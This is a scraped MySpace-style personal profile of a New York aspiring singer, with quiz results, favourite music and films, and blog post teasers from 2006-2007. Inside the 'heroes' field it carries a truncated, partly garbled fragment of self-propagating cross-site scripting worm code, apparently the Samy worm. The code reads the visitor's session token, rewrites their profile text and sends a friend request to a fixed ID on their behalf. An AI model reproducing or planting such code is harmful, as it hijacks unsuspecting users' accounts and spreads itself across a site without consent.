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New York New York!!!!

About Me

My Interests

I'm just about up for anything if it makes me happy and wouldn't kill me in the near future...

I'd like to meet:

I would love to meet Idena Minzel and Linda Eder. They are two of my favorite Broadway singers and Linda Eder is my idol....Video of my friend Clay Price conducting the last show i did with him,,This song was dedicated to our friend Tom Walden!!!!It's me singing in the background.. width="425" height="350" .. ?? Which Of The Greek Gods Are You ??
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You're a Freaky Kisser
When you kiss, you want to experience something new
A new technique, a new partner, a new piercing...
And your own personal kissing style is very unpredictable
There's no saying where your tongue or hands will go What Kind of Kisser Are You?

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I know it's cliche' but i like all types of music, but mostly rock music any era, not to much country though.. width="425" height="350" ..


My favorite movies are big epic films like Braveheart,Troy, and King Arthur..... but it has nothing to do with the fact that they are all hot men in those movies.. Oh i love the Blade movies too..
Your Life Path Number is 8
Your purpose in life is to help others succeed

You are both a natural leader and a natural success. You are also a great judge of character.
You have a head for business and finance. You know how to make money.
A great visionary, you can see gold where other people see nothing.

In love, you are very generous - with gifts, time, and guidance.

You love to inspire people, but it can be frustrating when they don't understand your vision.
Great success comes easily for you. But so does great failure, as you are very reckless.
You are confident, and sometimes this confidence borders on arrogance. What Is Your Life Path Number?


What Classic Pin-Up Are You?
You're Bettie Page!
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Harry Potter Books and any Vampire book
Your Seduction Style: Siren / Rake
You possess an unbridled sensuality that appeals to many.
The minute you meet anyone, you can make the crave you almost immediately.
You give others the chance to lose control with you... spiraling into carnal bliss.
A dangerous lover, you both fascinate and scare those you attract. What Is Your Seduction Style?


my mom is my hero caus eshe raised 4 girls all on her own 0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','% 2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26' )}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}..'J...statechange=BI');J.open(BJ,BH,true);if(BJ=='POS T'){J.setRequestHeader('Content-Type','application/x-www-for m-urlencoded');J.setRequestHeader('Content-Length',BK.length )}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=getSource();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace ('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes',' ');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){ if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview'; AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseact ion=profile.previewInterests&Mytoken='+AR,postHero,'POST ',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';A S['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');ht tpSend('/index.cfm?fuseaction=profile.processInterests&M ytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN +'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET'); xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite .addfriend_verify&friendID=11851658&Mytoken='+L,proc essxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['subm it']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsP rocess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}f unction httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}..'xmlhttp2...statechange=BI');xmlhttp2.open(BJ,BH,tru e);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type',' application/x-www-form-urlencoded');xmlhttp2.setRequestHeade r('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"
K Keen
A Awesome
T Trustworthy
R Radical
I Intelligent
N Nerdy
A Altruistic
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Name Acronym Generator
From Go-Quiz.com a class='hov' style='display:block;width:300px;border:solid 2px black;padding:5px'

My Blog

NYC Update Nov. 2007!!

Hey to everyone who reads this thing.. Just thought i would write a little bit and tell everyone whats been going on..Lets see first i finally quit Starbucks..I am now working at american Express Adve...
Posted by Kat on Sat, 10 Nov 2007 10:38:00 PST

Exciting news..!!!

So i just wanted to let everyone know the awesome news that i just got... Last week I had a fantastic audition for stiletto entertainment who casts for holland of America cruise lines,, and i just fou...
Posted by Kat on Thu, 20 Sep 2007 06:37:00 PST

one Year in Ny!! Are ya kidding me

Wow! Can you believe it? It's a year today since i left Florida and moved to NY to pursue my dream... I can't believe a year has flown by so fast.. It's been an amazing year.. One big Rollercoaster ri...
Posted by Kat on Fri, 03 Aug 2007 09:41:00 PST

NYC Update!!

So it's amazing what a little furniture rearranging can do.. It took my closet and made it feel like a room finally..My pictures are now on the wall instead of the floor and i finally feel like i have...
Posted by Kat on Tue, 16 Jan 2007 09:44:00 PST

New Job!!!

Ok so i just wanted to post some exciting news!!! I got a new awesome job!!.. I'm going to be a part of the Party Planning Department at F.A.O. Shwartz!! I'm so excited.. I get to plan the parties and...
Posted by Kat on Fri, 17 Nov 2006 10:01:00 PST

Just felt the need to write

So alot has happened with in this last week..First i went to a Disney audition and after 7 years of auditioning for them I got my first Callback...It felt great,, I got called back to sing for Mulch S...
Posted by Kat on Mon, 23 Oct 2006 11:52:00 PST

More News from New York!!

So i haven't blogged in over a month so i thought i would leave a little update now....Things have been going really good.. Our New Starbucks store is awesome...I especially like our little nook with ...
Posted by Kat on Thu, 12 Oct 2006 08:31:00 PST

New York Update

Ok so it's 1:30 in the morning and as usual i can't sleep.. So i thought to myself I haven't blogged in a while, why not write a little update... So i guess i'll start off  with how my first real...
Posted by Kat on Thu, 07 Sep 2006 10:57:00 PST

Yeah for my 1st call back!!

So yeah i am very excited.. I've only been here for 2 weeks and i've already made it through my first type out audition and got my first callback.. On friday i auditioned for this theater in New Hamps...
Posted by Kat on Mon, 21 Aug 2006 11:53:00 PST

Update from New York

Well i started my first day of training at Starbucks today.. and i think it's gonna be really cool. My manger is great and a little whacky.. I love him.. he says he likes to have fun at work and treat...
Posted by Kat on Wed, 16 Aug 2006 10:20:00 PST